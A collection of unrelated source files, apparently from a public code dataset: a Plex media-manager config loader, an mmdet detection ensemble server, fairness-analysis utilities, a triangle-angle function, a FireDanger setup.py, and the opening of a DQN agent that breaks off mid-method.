"tag": check_for_attribute(self.data, "tag", parent="radarr", var_type="lower_list", default_is_none=True),
"search": check_for_attribute(self.data, "search", parent="radarr", var_type="bool", default=False)
}
self.general["sonarr"] = {
"url": check_for_attribute(self.data, "url", parent="sonarr", var_type="url", default_is_none=True),
"token": check_for_attribute(self.data, "token", parent="sonarr", default_is_none=True),
"add": check_for_attribute(self.data, "add", parent="sonarr", var_type="bool", default=False),
"add_existing": check_for_attribute(self.data, "add_existing", parent="sonarr", var_type="bool", default=False),
"root_folder_path": check_for_attribute(self.data, "root_folder_path", parent="sonarr", default_is_none=True),
"monitor": check_for_attribute(self.data, "monitor", parent="sonarr", test_list=sonarr.monitor_descriptions, default="all"),
"quality_profile": check_for_attribute(self.data, "quality_profile", parent="sonarr", default_is_none=True),
"language_profile": check_for_attribute(self.data, "language_profile", parent="sonarr", default_is_none=True),
"series_type": check_for_attribute(self.data, "series_type", parent="sonarr", test_list=sonarr.series_type_descriptions, default="standard"),
"season_folder": check_for_attribute(self.data, "season_folder", parent="sonarr", var_type="bool", default=True),
"tag": check_for_attribute(self.data, "tag", parent="sonarr", var_type="lower_list", default_is_none=True),
"search": check_for_attribute(self.data, "search", parent="sonarr", var_type="bool", default=False),
"cutoff_search": check_for_attribute(self.data, "cutoff_search", parent="sonarr", var_type="bool", default=False)
}
self.general["tautulli"] = {
"url": check_for_attribute(self.data, "url", parent="tautulli", var_type="url", default_is_none=True),
"apikey": check_for_attribute(self.data, "apikey", parent="tautulli", default_is_none=True)
}
self.libraries = []
libs = check_for_attribute(self.data, "libraries", throw=True)
for library_name, lib in libs.items():
if self.requested_libraries and library_name not in self.requested_libraries:
continue
util.separator()
params = {
"mapping_name": str(library_name),
"name": str(lib["library_name"]) if lib and "library_name" in lib and lib["library_name"] else str(library_name)
}
display_name = f"{params['name']} ({params['mapping_name']})" if lib and "library_name" in lib and lib["library_name"] else params["mapping_name"]
util.separator(f"{display_name} Configuration")
logger.info("")
logger.info(f"Connecting to {display_name} Library...")
params["asset_directory"] = check_for_attribute(lib, "asset_directory", parent="settings", var_type="list_path", default=self.general["asset_directory"], default_is_none=True, save=False)
if params["asset_directory"] is None:
logger.warning("Config Warning: Assets will not be used asset_directory attribute must be set under config or under this specific Library")
params["asset_folders"] = check_for_attribute(lib, "asset_folders", parent="settings", var_type="bool", default=self.general["asset_folders"], do_print=False, save=False)
params["sync_mode"] = check_for_attribute(lib, "sync_mode", parent="settings", test_list=sync_modes, default=self.general["sync_mode"], do_print=False, save=False)
params["show_unmanaged"] = check_for_attribute(lib, "show_unmanaged", parent="settings", var_type="bool", default=self.general["show_unmanaged"], do_print=False, save=False)
params["show_filtered"] = check_for_attribute(lib, "show_filtered", parent="settings", var_type="bool", default=self.general["show_filtered"], do_print=False, save=False)
params["show_missing"] = check_for_attribute(lib, "show_missing", parent="settings", var_type="bool", default=self.general["show_missing"], do_print=False, save=False)
params["show_missing_assets"] = check_for_attribute(lib, "show_missing_assets", parent="settings", var_type="bool", default=self.general["show_missing_assets"], do_print=False, save=False)
params["save_missing"] = check_for_attribute(lib, "save_missing", parent="settings", var_type="bool", default=self.general["save_missing"], do_print=False, save=False)
params["missing_only_released"] = check_for_attribute(lib, "missing_only_released", parent="settings", var_type="bool", default=self.general["missing_only_released"], do_print=False, save=False)
params["create_asset_folders"] = check_for_attribute(lib, "create_asset_folders", parent="settings", var_type="bool", default=self.general["create_asset_folders"], do_print=False, save=False)
params["collection_minimum"] = check_for_attribute(lib, "collection_minimum", parent="settings", var_type="int", default=self.general["collection_minimum"], do_print=False, save=False)
params["delete_below_minimum"] = check_for_attribute(lib, "delete_below_minimum", parent="settings", var_type="bool", default=self.general["delete_below_minimum"], do_print=False, save=False)
params["delete_unmanaged_collections"] = check_for_attribute(lib, "delete_unmanaged_collections", parent="settings", var_type="bool", default=False, do_print=False, save=False)
params["delete_collections_with_less"] = check_for_attribute(lib, "delete_collections_with_less", parent="settings", var_type="int", default_is_none=True, do_print=False, save=False)
params["error_webhooks"] = check_for_attribute(lib, "error", parent="webhooks", var_type="list", default=self.webhooks["error"], do_print=False, save=False, default_is_none=True)
params["collection_creation_webhooks"] = check_for_attribute(lib, "collection_creation", parent="webhooks", var_type="list", default=self.webhooks["collection_creation"], do_print=False, save=False, default_is_none=True)
params["collection_addition_webhooks"] = check_for_attribute(lib, "collection_addition", parent="webhooks", var_type="list", default=self.webhooks["collection_addition"], do_print=False, save=False, default_is_none=True)
params["collection_removal_webhooks"] = check_for_attribute(lib, "collection_removal", parent="webhooks", var_type="list", default=self.webhooks["collection_removal"], do_print=False, save=False, default_is_none=True)
params["assets_for_all"] = check_for_attribute(lib, "assets_for_all", parent="settings", var_type="bool", default=self.general["assets_for_all"], do_print=False, save=False)
params["mass_genre_update"] = check_for_attribute(lib, "mass_genre_update", test_list=mass_update_options, default_is_none=True, save=False, do_print=False)
params["mass_audience_rating_update"] = check_for_attribute(lib, "mass_audience_rating_update", test_list=mass_update_options, default_is_none=True, save=False, do_print=False)
params["mass_critic_rating_update"] = check_for_attribute(lib, "mass_critic_rating_update", test_list=mass_update_options, default_is_none=True, save=False, do_print=False)
params["mass_trakt_rating_update"] = check_for_attribute(lib, "mass_trakt_rating_update", var_type="bool", default=False, save=False, do_print=False)
params["split_duplicates"] = check_for_attribute(lib, "split_duplicates", var_type="bool", default=False, save=False, do_print=False)
params["radarr_add_all"] = check_for_attribute(lib, "radarr_add_all", var_type="bool", default=False, save=False, do_print=False)
params["sonarr_add_all"] = check_for_attribute(lib, "sonarr_add_all", var_type="bool", default=False, save=False, do_print=False)
if lib and "operations" in lib and lib["operations"]:
if isinstance(lib["operations"], dict):
if "assets_for_all" in lib["operations"]:
params["assets_for_all"] = check_for_attribute(lib["operations"], "assets_for_all", var_type="bool", default=False, save=False)
if "delete_unmanaged_collections" in lib["operations"]:
params["delete_unmanaged_collections"] = check_for_attribute(lib["operations"], "delete_unmanaged_collections", var_type="bool", default=False, save=False)
if "delete_collections_with_less" in lib["operations"]:
params["delete_collections_with_less"] = check_for_attribute(lib["operations"], "delete_collections_with_less", var_type="int", default_is_none=True, save=False)
if "mass_genre_update" in lib["operations"]:
params["mass_genre_update"] = check_for_attribute(lib["operations"], "mass_genre_update", test_list=mass_update_options, default_is_none=True, save=False)
if "mass_audience_rating_update" in lib["operations"]:
params["mass_audience_rating_update"] = check_for_attribute(lib["operations"], "mass_audience_rating_update", test_list=mass_update_options, default_is_none=True, save=False)
if "mass_critic_rating_update" in lib["operations"]:
params["mass_critic_rating_update"] = check_for_attribute(lib["operations"], "mass_critic_rating_update", test_list=mass_update_options, default_is_none=True, save=False)
if "mass_trakt_rating_update" in lib["operations"]:
params["mass_trakt_rating_update"] = check_for_attribute(lib["operations"], "mass_trakt_rating_update", var_type="bool", default=False, save=False)
if "split_duplicates" in lib["operations"]:
params["split_duplicates"] = check_for_attribute(lib["operations"], "split_duplicates", var_type="bool", default=False, save=False)
if "radarr_add_all" in lib["operations"]:
params["radarr_add_all"] = check_for_attribute(lib["operations"], "radarr_add_all", var_type="bool", default=False, save=False)
if "sonarr_add_all" in lib["operations"]:
params["sonarr_add_all"] = check_for_attribute(lib["operations"], "sonarr_add_all", var_type="bool", default=False, save=False)
else:
logger.error("Config Error: operations must be a dictionary")
def error_check(attr, service):
params[attr] = None
err = f"Config Error: {attr} cannot be omdb without a successful {service} Connection"
self.errors.append(err)
logger.error(err)
if self.OMDb is None and params["mass_genre_update"] == "omdb":
error_check("mass_genre_update", "OMDb")
if self.OMDb is None and params["mass_audience_rating_update"] == "omdb":
error_check("mass_audience_rating_update", "OMDb")
if self.OMDb is None and params["mass_critic_rating_update"] == "omdb":
error_check("mass_critic_rating_update", "OMDb")
if self.Trakt is None and params["mass_trakt_rating_update"]:
error_check("mass_trakt_rating_update", "Trakt")
try:
if lib and "metadata_path" in lib:
params["metadata_path"] = []
if lib["metadata_path"] is None:
raise Failed("Config Error: metadata_path attribute is blank")
paths_to_check = lib["metadata_path"] if isinstance(lib["metadata_path"], list) else [lib["metadata_path"]]
for path in paths_to_check:
if isinstance(path, dict):
def check_dict(attr, name):
if attr in path:
if path[attr] is None:
err = f"Config Error: metadata_path {attr} is blank"
self.errors.append(err)
logger.error(err)
else:
params["metadata_path"].append((name, path[attr]))
check_dict("url", "URL")
check_dict("git", "Git")
check_dict("file", "File")
check_dict("folder", "Folder")
else:
params["metadata_path"].append(("File", path))
else:
params["metadata_path"] = [("File", os.path.join(default_dir, f"{library_name}.yml"))]
params["default_dir"] = default_dir
params["plex"] = {
"url": check_for_attribute(lib, "url", parent="plex", var_type="url", default=self.general["plex"]["url"], req_default=True, save=False),
"token": check_for_attribute(lib, "token", parent="plex", default=self.general["plex"]["token"], req_default=True, save=False),
"timeout": check_for_attribute(lib, "timeout", parent="plex", var_type="int", default=self.general["plex"]["timeout"], save=False),
"clean_bundles": check_for_attribute(lib, "clean_bundles", parent="plex", var_type="bool", default=self.general["plex"]["clean_bundles"], save=False),
"empty_trash": check_for_attribute(lib, "empty_trash", parent="plex", var_type="bool", default=self.general["plex"]["empty_trash"], save=False),
"optimize": check_for_attribute(lib, "optimize", parent="plex", var_type="bool", default=self.general["plex"]["optimize"], save=False)
}
library = Plex(self, params)
logger.info("")
logger.info(f"{display_name} Library Connection Successful")
except Failed as e:
self.errors.append(e)
util.print_stacktrace()
util.print_multiline(e, error=True)
logger.info(f"{display_name} Library Connection Failed")
continue
if self.general["radarr"]["url"] or (lib and "radarr" in lib):
logger.info("")
util.separator("Radarr Configuration", space=False, border=False)
logger.info("")
logger.info(f"Connecting to {display_name} library's Radarr...")
logger.info("")
try:
library.Radarr = Radarr(self, {
"url": check_for_attribute(lib, "url", parent="radarr", var_type="url", default=self.general["radarr"]["url"], req_default=True, save=False),
"token": check_for_attribute(lib, "token", parent="radarr", default=self.general["radarr"]["token"], req_default=True, save=False),
"add": check_for_attribute(lib, "add", parent="radarr", var_type="bool", default=self.general["radarr"]["add"], save=False),
"add_existing": check_for_attribute(lib, "add_existing", parent="radarr", var_type="bool", default=self.general["radarr"]["add_existing"], save=False),
"root_folder_path": check_for_attribute(lib, "root_folder_path", parent="radarr", default=self.general["radarr"]["root_folder_path"], req_default=True, save=False),
"monitor": check_for_attribute(lib, "monitor", parent="radarr", var_type="bool", default=self.general["radarr"]["monitor"], save=False),
"availability": check_for_attribute(lib, "availability", parent="radarr", test_list=radarr.availability_descriptions, default=self.general["radarr"]["availability"], save=False),
"quality_profile": check_for_attribute(lib, "quality_profile", parent="radarr",default=self.general["radarr"]["quality_profile"], req_default=True, save=False),
"tag": check_for_attribute(lib, "tag", parent="radarr", var_type="lower_list", default=self.general["radarr"]["tag"], default_is_none=True, save=False),
"search": check_for_attribute(lib, "search", parent="radarr", var_type="bool", default=self.general["radarr"]["search"], save=False)
})
except Failed as e:
self.errors.append(e)
util.print_stacktrace()
util.print_multiline(e, error=True)
logger.info("")
logger.info(f"{display_name} library's Radarr Connection {'Failed' if library.Radarr is None else 'Successful'}")
if self.general["sonarr"]["url"] or (lib and "sonarr" in lib):
logger.info("")
util.separator("Sonarr Configuration", space=False, border=False)
logger.info("")
logger.info(f"Connecting to {display_name} library's Sonarr...")
logger.info("")
try:
library.Sonarr = Sonarr(self, {
"url": check_for_attribute(lib, "url", parent="sonarr", var_type="url", default=self.general["sonarr"]["url"], req_default=True, save=False),
"token": check_for_attribute(lib, "token", parent="sonarr", default=self.general["sonarr"]["token"], req_default=True, save=False),
"add": check_for_attribute(lib, "add", parent="sonarr", var_type="bool", default=self.general["sonarr"]["add"], save=False),
"add_existing": check_for_attribute(lib, "add_existing", parent="sonarr", var_type="bool", default=self.general["sonarr"]["add_existing"], save=False),
"root_folder_path": check_for_attribute(lib, "root_folder_path", parent="sonarr", default=self.general["sonarr"]["root_folder_path"], req_default=True, save=False),
"monitor": check_for_attribute(lib, "monitor", parent="sonarr", test_list=sonarr.monitor_descriptions, default=self.general["sonarr"]["monitor"], save=False),
"quality_profile": check_for_attribute(lib, "quality_profile", parent="sonarr", default=self.general["sonarr"]["quality_profile"], req_default=True, save=False),
"language_profile": check_for_attribute(lib, "language_profile", parent="sonarr", default=self.general["sonarr"]["language_profile"], save=False) if self.general["sonarr"]["language_profile"] else check_for_attribute(lib, "language_profile", parent="sonarr", default_is_none=True, save=False),
"series_type": check_for_attribute(lib, "series_type", parent="sonarr", test_list=sonarr.series_type_descriptions, default=self.general["sonarr"]["series_type"], save=False),
"season_folder": check_for_attribute(lib, "season_folder", parent="sonarr", var_type="bool", default=self.general["sonarr"]["season_folder"], save=False),
"tag": check_for_attribute(lib, "tag", parent="sonarr", var_type="lower_list", default=self.general["sonarr"]["tag"], default_is_none=True, save=False),
"search": check_for_attribute(lib, "search", parent="sonarr", var_type="bool", default=self.general["sonarr"]["search"], save=False),
"cutoff_search": check_for_attribute(lib, "cutoff_search", parent="sonarr", var_type="bool", default=self.general["sonarr"]["cutoff_search"], save=False)
})
except Failed as e:
self.errors.append(e)
util.print_stacktrace()
util.print_multiline(e, error=True)
logger.info("")
logger.info(f"{display_name} library's Sonarr Connection {'Failed' if library.Sonarr is None else 'Successful'}")
if self.general["tautulli"]["url"] or (lib and "tautulli" in lib):
logger.info("")
util.separator("Tautulli Configuration", space=False, border=False)
logger.info("")
logger.info(f"Connecting to {display_name} library's Tautulli...")
logger.info("")
try:
library.Tautulli = Tautulli(self, {
"url": check_for_attribute(lib, "url", parent="tautulli", var_type="url", default=self.general["tautulli"]["url"], req_default=True, save=False),
"apikey": check_for_attribute(lib, "apikey", parent="tautulli", default=self.general["tautulli"]["apikey"], req_default=True, save=False)
})
except Failed as e:
self.errors.append(e)
util.print_stacktrace()
util.print_multiline(e, error=True)
logger.info("")
logger.info(f"{display_name} library's Tautulli Connection {'Failed' if library.Tautulli is None else 'Successful'}")
library.Webhooks = Webhooks(self, {"error_webhooks": library.error_webhooks}, library=library, notifiarr=self.NotifiarrFactory)
logger.info("")
self.libraries.append(library)
util.separator()
if len(self.libraries) > 0:
logger.info(f"{len(self.libraries)} Plex Library Connection{'s' if len(self.libraries) > 1 else ''} Successful")
else:
raise Failed("Plex Error: No Plex libraries were connected to")
util.separator()
if self.errors:
self.notify(self.errors)
except Exception as e:
self.notify(e)
raise
def notify(self, text, library=None, collection=None, critical=True):
for error in util.get_list(text, split=False):
self.Webhooks.error_hooks(error, library=library, collection=collection, critical=critical)
def get_html(self, url, headers=None, params=None):
return html.fromstring(self.get(url, headers=headers, params=params).content)
def get_json(self, url, json=None, headers=None, params=None):
return self.get(url, json=json, headers=headers, params=params).json()
@retry(stop_max_attempt_number=6, wait_fixed=10000)
def get(self, url, json=None, headers=None, params=None):
return self.session.get(url, json=json, headers=headers, params=params)
def get_image_encoded(self, url):
return base64.b64encode(self.get(url).content).decode('utf-8')
def post_html(self, url, data=None, json=None, headers=None):
return html.fromstring(self.post(url, data=data, json=json, headers=headers).content)
def post_json(self, url, data=None, json=None, headers=None):
return self.post(url, data=data, json=json, headers=headers).json()
@retry(stop_max_attempt_number=6, wait_fixed=10000)
def post(self, url, data=None, json=None, headers=None):
return self.session.post(url, data=data, json=json, headers=headers)
|
the-stack_106_13000
|
from ai_hub import inferServer, log
import json
import torch
import mmdet
from mmdet.apis import init_detector, inference_detector
import torch.nn as nn
import numpy as np
import cv2
import time
import os
from ensemble_boxes import *
exp_compositions = {
'cascade_s50_rfp': {
'config':
'/work/configs/tile_round2/cascade_s50_rfp_mstrain.py',
'checkpoint':
'/work/work_dirs/round2/swa_cascade_s50_rfp_mstrain_aug_v2/swa_model_12.pth'
},
'cascade_s50_rfpac': {
'config':
'/work/configs/tile_round2/cascade_s50_rfpac_mstrain.py',
'checkpoint':
'/work/work_dirs/round2/swa_cascade_s50_rfp_mstrain_acfpn/swa_model_12.pth'
}
}
exp = exp_compositions['cascade_s50_rfp']
config_file = exp['config']
checkpoint_file = exp['checkpoint']
e_exp = exp_compositions['cascade_s50_rfpac']
e_config_file = e_exp['config']
e_checkpoint_file = e_exp['checkpoint']
class MyServer(inferServer):
def __init__(self, model, e_model, using_pair=True):
super().__init__(model)
log.i('Init myserver now')
device_1 = torch.device("cuda:0")
device_2 = torch.device("cuda:1")
self.device_1 = device_1
self.device_2 = device_2
self.using_pair = using_pair
self.model = model.to(device_1)
self.model.eval()
self.e_model = e_model.to(device_2)
self.e_model.eval()
def pre_process(self, request):
        # Read the uploaded image from the multipart request; the paired 'img_t'
        # file is received here but not used by this server
start_time = time.time()
file = request.files['img']
file_t = request.files['img_t']
self.filename = file.filename
file_data = file.read()
img = cv2.imdecode(
np.frombuffer(file_data, np.uint8), cv2.IMREAD_COLOR)
end_time = time.time()
print('Preprocess time: {} seconds'.format(end_time - start_time))
return img
    def pridect(self, data):
        # NB: the spelling 'pridect' (sic) appears to be the hook name expected by
        # the ai_hub inferServer base class, so it is kept as-is.
        # remember here to fetch the first element of the detector output
start_time = time.time()
predictions = inference_detector(model=self.model, img=data)[0]
e_predictions = inference_detector(model=self.e_model, img=data)[0]
end_time = time.time()
print('Inference time: {} seconds'.format(end_time - start_time))
ret = {
'img': data,
'predictions': predictions,
'e_predictions': e_predictions
}
return ret
def post_predictions(self, predictions, img_shape):
bboxes_list, scores_list, labels_list = [], [], []
for i, bboxes in enumerate(predictions):
if len(bboxes) > 0 and i != 0:
detect_label = i
for bbox in bboxes:
xmin, ymin, xmax, ymax, score = bbox.tolist()
xmin /= img_shape[1]
ymin /= img_shape[0]
xmax /= img_shape[1]
ymax /= img_shape[0]
bboxes_list.append([xmin, ymin, xmax, ymax])
scores_list.append(score)
labels_list.append(detect_label)
return bboxes_list, scores_list, labels_list
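    # Worked example for post_predictions (illustrative): with img_shape =
    # (2000, 1000), i.e. (height, width), a raw box (100, 200, 300, 400, 0.9) is
    # normalized to [0.1, 0.1, 0.3, 0.2] with score 0.9, which is the [0, 1]
    # coordinate range that weighted_boxes_fusion expects.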
def ensemble(self,
predictions,
e_predictions,
img_shape,
method='weighted_boxes_fusion',
weights=[1.5, 1],
iou_thr=0.5,
skip_box_thr=0.0001,
sigma=0.1):
bboxes, scores, labels = self.post_predictions(predictions, img_shape)
e_bboxes, e_scores, e_labels = self.post_predictions(
e_predictions, img_shape)
bboxes_list = [bboxes, e_bboxes]
scores_list = [scores, e_scores]
labels_list = [labels, e_labels]
bboxes, scores, labels = eval(method)(
bboxes_list,
scores_list,
labels_list,
weights=weights,
iou_thr=iou_thr,
skip_box_thr=skip_box_thr)
return bboxes, scores, labels
def post_process(self, data):
predictions = data['predictions']
e_predictions = data['e_predictions']
img_shape = data['img'].shape[:2]
out = self.ensemble(predictions, e_predictions, img_shape)
predict_rslt = []
max_score = -1
score_thr = 0.3
for (box, score, label) in zip(*out):
xmin, ymin, xmax, ymax = box.tolist()
xmin, ymin, xmax, ymax = round(
float(xmin) * img_shape[1],
2), round(float(ymin) * img_shape[0],
2), round(float(xmax) * img_shape[1],
2), round(float(ymax) * img_shape[0], 2)
max_score = max(max_score, score)
if xmax - xmin < 3 or ymax - ymin < 3:
continue
dict_instance = dict()
dict_instance['name'] = self.filename
dict_instance['category'] = int(label)
dict_instance['score'] = round(float(score), 6)
dict_instance['bbox'] = [xmin, ymin, xmax, ymax]
predict_rslt.append(dict_instance)
if max_score < score_thr:
predict_rslt = []
return predict_rslt
def debug(self, filename):
start_time = time.time()
self.filename = filename
img = cv2.imread(filename)
end_time = time.time()
print('Preprocess time: {} seconds'.format(end_time - start_time))
data = self.pridect(img)
data = self.post_process(data)
return data
if __name__ == '__main__':
model = init_detector(
config=config_file, checkpoint=checkpoint_file, device='cpu')
e_model = init_detector(
config=e_config_file, checkpoint=e_checkpoint_file, device='cpu')
log.i('Init model success')
myserver = MyServer(model=model, e_model=e_model, using_pair=False)
# myserver.debug('test.jpg')
myserver.run(debuge=False)
|
the-stack_106_13001
|
'''
Back-end functions used throughout the library
'''
from importlib.util import find_spec
import numpy as np
import pandas as pd
from . import __preprocessing as prep
from .__validation import validate_X, ValidationError
from warnings import warn
def cb_round(series, base=5, sig_dec=0):
""" Returns the pandas series (or column) with values rounded per the
custom base value
Args:
series (pd.Series): data to be rounded
base (float): base value to which data should be rounded (may be
decimal)
sig_dec (int): number of significant decimals for the
custom-rounded value
"""
if not base >= 0.01:
err = (f"cannot round with base {base}." +
"cb_round designed for base >= 0.01.")
raise ValueError(err)
result = series.apply(lambda x: round(base * round(float(x)/base), sig_dec))
return result
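# Illustrative usage (not part of the original module): rounding to the nearest
# 0.5 with two significant decimals.
# >>> cb_round(pd.Series([1.23, 2.74, 9.99]), base=0.5, sig_dec=2)
# returns a Series of approximately [1.0, 2.5, 10.0]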
def bootstrap_significance(a, b, func, alpha=0.05, n_samples=50, n_trials=100):
""" Applies bootstrapping to evaluate the statistical difference between
two samples. Returns True (significant) if the p-value is less than alpha
for at least P=1-alpha percent of trials.
Args:
a (array-like): statistical sample.
b (array-like): statistical sample for comparison.
        func (function): any statistical test returning its p-value as the
second member of a tuple.
alpha (float, optional): Maximum p-value indicating significance.
Defaults to 0.05.
n_samples (int, optional): Number of samples to use for each trial.
Defaults to 50.
n_trials (int, optional): Number of trials to run. Defaults to 100.
Returns:
bool: whether difference is statistically significant
"""
pvals = []
# Create a list of p-values for each of n_trials
for i in range( 0, n_trials):
pvals += [func(np.random.choice(a, size=n_samples, replace=True),
np.random.choice(b, size=n_samples, replace=True))[1]
]
# Calculate the proportion of trials for which p < alpha
pvals = [int(v <= alpha) for v in pvals]
result = bool(np.mean(pvals) >= (1-alpha))
return result
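# Illustrative usage sketch (assumes scipy is installed in the caller's
# environment; it is not imported by this module):
# from scipy.stats import ttest_ind
# a = np.random.normal(0.0, 1.0, size=500)
# b = np.random.normal(1.0, 1.0, size=500)
# bootstrap_significance(a, b, ttest_ind)  # typically True for clearly separated samples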
def feature_table(df):
''' Displays a table containing statistics on the features available in the
passed df
Args:
df (pandas df): dataframe containing MIMIC data for the tutorial
'''
print(f"\n This data subset has {df.shape[0]} total observations" +
f" and {df.shape[1]-2} input features \n")
feat_df = pd.DataFrame({'feature': df.columns.tolist()
}).query(
'feature not in ["ADMIT_ID", "length_of_stay"]')
feat_df['Raw Feature'] = feat_df['feature'].str.split("_").str[0]
count_df = feat_df.groupby('Raw Feature', as_index=False
)['feature'].count(
).rename(columns={
'feature': 'Category Count (Encoded Features).'})
return count_df
def format_errwarn(func):
""" Wraps a function returning some result with dictionaries for errors and
warnings, then formats those errors and warnings as grouped warnings.
    Used by reporting functions to skip errors (and warnings) during
    processing while still surfacing them to the user as grouped warnings.
Args:
func (function): any function returning a tuple of format:
(result, error_dictionary, warning_dictionary). Note that
dictionaries should be of form {<column or id>:<message>}
Returns:
function: the first member of the tuple returned by func
"""
    def format_info(msg_dict):
        # Parameter renamed to avoid shadowing the builtin "dict"
        info_dict = {}
        for colname, err_wrn in msg_dict.items():
_ew = list(set(err_wrn)) if isinstance(err_wrn, list) else [err_wrn]
for m in _ew:
m = getattr(m, 'message') if 'message' in dir(m) else str(m)
if m in info_dict.keys():
info_dict[m].append(colname)
else:
info_dict[m] = [colname]
info_dict = {ew:list(set(c)) for ew, c in info_dict.items()}
return info_dict
def wrapper(*args, **kwargs):
res, errs, warns = func(*args, **kwargs)
if any(errs):
err_dict = format_info(errs)
for er, cols in err_dict.items():
warn(f"Error processing column(s) {cols}. {er}\n")
if any(warns):
warn_dict = format_info(warns)
for wr, cols in warn_dict.items():
warn(f"Possible error in column(s) {cols}. {wr}\n")
return res
return wrapper
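# Illustrative usage sketch (hypothetical function, not part of this module):
# the decorated callable must return (result, error_dict, warning_dict); the
# wrapper then re-emits the collected issues as grouped warnings.
# @format_errwarn
# def summarize(df):
#     errs, warns = {}, {}
#     ...  # populate errs/warns keyed by column name
#     return df.describe(), errs, warns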
def iterate_cohorts(func):
""" Runs the function for each cohort subset
Args:
func (function): the function to iterate
Returns:
cohort-iterated version of the output
"""
def prepend_cohort(df, new_ix):
idx = df.index.to_frame().rename(columns={0:'__index'})
for l, i in enumerate(new_ix):
idx.insert(l, i[0], i[1])
if '__index' in idx.columns:
idx.drop('__index', axis=1, inplace=True)
df.index = pd.MultiIndex.from_frame(idx)
return df
def subset(data, idxs):
if data is not None:
return data.loc[idxs,]
else:
return None
def wrapper(cohorts=None, **kwargs):
""" Iterates for each cohort subset
Args:
cohorts (array-like or dataframe, optional): Groups by which to
subset the data. Defaults to None.
Returns:
pandas DataFrame
"""
# Run preprocessing to facilitate subsetting
X = kwargs.pop('X', None)
y_true = kwargs.get('y_true', None)
y_pred = kwargs.get('y_pred', None)
y_prob = kwargs.get('y_prob', None)
prtc_attr = kwargs.get('prtc_attr', None)
X, prtc_attr, y_true, y_pred, y_prob = \
prep.standard_preprocess(X, prtc_attr, y_true, y_pred, y_prob)
        # When cohort labels are provided, evaluate the function separately per cohort
if cohorts is not None:
            # Validate and prep the cohort data so it can be aligned with X
validate_X(cohorts, name="cohorts", expected_len=X.shape[0])
cohorts = prep.prep_X(cohorts)
            # Group row indices by the unique cohort combinations
cix = cohorts.index
cols = cohorts.columns.tolist()
cgrp = cohorts.groupby(cols)
limit_alert(cgrp, "permutations of cohorts", 8)
            # Run the wrapped function on each cohort subset and stack the results
results = []
for k in cgrp.groups.keys():
ixs = cix.astype('int64').isin(cgrp.groups[k])
yt = subset(y_true, ixs)
yh = subset(y_pred, ixs)
yp = subset(y_prob, ixs)
pa = subset(prtc_attr, ixs)
new_args = ['prtc_attr', 'y_true', 'y_pred', 'y_prob']
sub_args = {k:v for k, v in kwargs.items() if k not in new_args}
df = func(X=X.iloc[ixs, :], y_true=yt, y_pred=yh, y_prob=yp,
prtc_attr=pa, **sub_args)
vals = cgrp.get_group(k)[cols].head(1).values[0]
ix = [(c, vals[i]) for i, c in enumerate(cols)]
df = prepend_cohort(df, ix)
results.append(df)
output = pd.concat(results, axis=0)
return output
else:
return func(X=X, **kwargs)
return wrapper
def is_dictlike(obj):
dictlike = all([callable(getattr(obj, "keys", None)),
not hasattr(obj, "size")])
return dictlike
def limit_alert(items:list=None, item_name="", limit:int=100,
issue:str="This may slow processing time."):
""" Warns the user if there are too many items due to potentially slowed
processing time
"""
if any(items):
if len(items) > limit:
msg = f"More than {limit} {item_name} detected. {issue}"
warn(msg)
def validate_notebook_requirements():
""" Alerts the user if they're missing packages required to run extended
tutorial and example notebooks
"""
if find_spec('fairlearn') is None:
err = ("This notebook cannot be re-run witout Fairlearn, available " +
"via https://github.com/fairlearn/fairlearn. Please install " +
"Fairlearn to run this notebook.")
raise ValidationError(err)
else:
pass
|
the-stack_106_13002
|
import math
def trg(a, b):
    """Given the two legs a and b of a right triangle, print the smaller
    acute angle (in whole degrees) between the hypotenuse and a leg."""
    a = int(a)
    b = int(b)
    c = math.sqrt(a ** 2 + b ** 2)   # hypotenuse
    t1 = math.acos(a / c)            # angle adjacent to leg a, in radians
    t1 = t1 * 180 / math.pi          # convert to degrees
    t2 = round(t1)
    if t2 > 45:                      # keep the smaller of the two acute angles
        t2 = 90 - t2
    print(t2)
trg(5,12)
|
the-stack_106_13003
|
#!/usr/bin/env python
from setuptools import setup, find_packages
with open("README.rst", "r") as f:
readme = f.read()
setup(
name="FireDanger",
version="0.0.1",
description="Calculation of indices for forest fire risk assessment in weather and climate data.",
long_description=readme,
long_description_content_type="text/x-rst",
author="Daniel Steinfeld",
author_email="[email protected]",
url="https://github.com/steidani/FireDanger",
project_urls={
"Bug Tracker": "https://github.com/steidani/FireDanger/issues",
},
packages=find_packages(exclude=("tests", "tests.*", "docs", "docs.*", "examples", "examples.*" )),
python_requires=">=3.6",
install_requires=open("requirements.txt").read().split(),
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Intended Audience :: Science/Research",
"Topic :: Scientific/Engineering :: Atmospheric Science",
],
keywords=["data", "science", "meteorology", "climate", "extreme weather", "forest fire", "wildfire"]
)
|
the-stack_106_13004
|
import numpy as np
import random
from collections import namedtuple, deque
from model import QNetwork
import torch
import torch.nn.functional as F
import torch.optim as optim
BUFFER_SIZE = int(1e5) # replay buffer size
BATCH_SIZE = 64 # minibatch size
GAMMA = 0.99 # discount factor
TAU = 1e-3 # for soft update of target parameters
LR = 5e-4 # learning rate
UPDATE_EVERY = 4 # how often to update the network
class Agent():
"""Interacts with and learns from the environment."""
def __init__(self, state_size, action_size, seed, device="cpu", use_double_dqn=False):
"""Initialize an Agent object.
Params
======
state_size (int): dimension of each state
action_size (int): dimension of each action
seed (int): random seed
            device (str): name of compute device, i.e. cpu or cuda:0
"""
self.state_size = state_size
self.action_size = action_size
self.seed = random.seed(seed)
        # Initialize compute device (cpu or gpu)
self.device = torch.device(device)
# Q-Network
self.qnetwork_local = QNetwork(state_size, action_size, seed).to(self.device)
self.qnetwork_target = QNetwork(state_size, action_size, seed).to(self.device)
self.optimizer = optim.Adam(self.qnetwork_local.parameters(), lr=LR)
# Replay memory
self.memory = ReplayBuffer(action_size, BUFFER_SIZE, BATCH_SIZE, seed, self.device)
# Initialize time step (for updating every UPDATE_EVERY steps)
self.t_step = 0
if use_double_dqn:
self.qtargets_next = self.double_dqn_qtargets_next
else:
self.qtargets_next = self.dqn_qtargets_next
def step(self, state, action, reward, next_state, done):
# Save experience in replay memory
self.memory.add(state, action, reward, next_state, done)
# Learn every UPDATE_EVERY time steps.
self.t_step = (self.t_step + 1) % UPDATE_EVERY
if self.t_step == 0:
# If enough samples are available in memory, get random subset and learn
if len(self.memory) > BATCH_SIZE:
                # Experience Replay: Break correlation between consecutive experience
# tuples by sampling them randomly out of order
experiences = self.memory.sample()
self.learn(experiences, GAMMA)
def act(self, state, eps=0.):
"""Returns actions for given state as per current policy.
Params
======
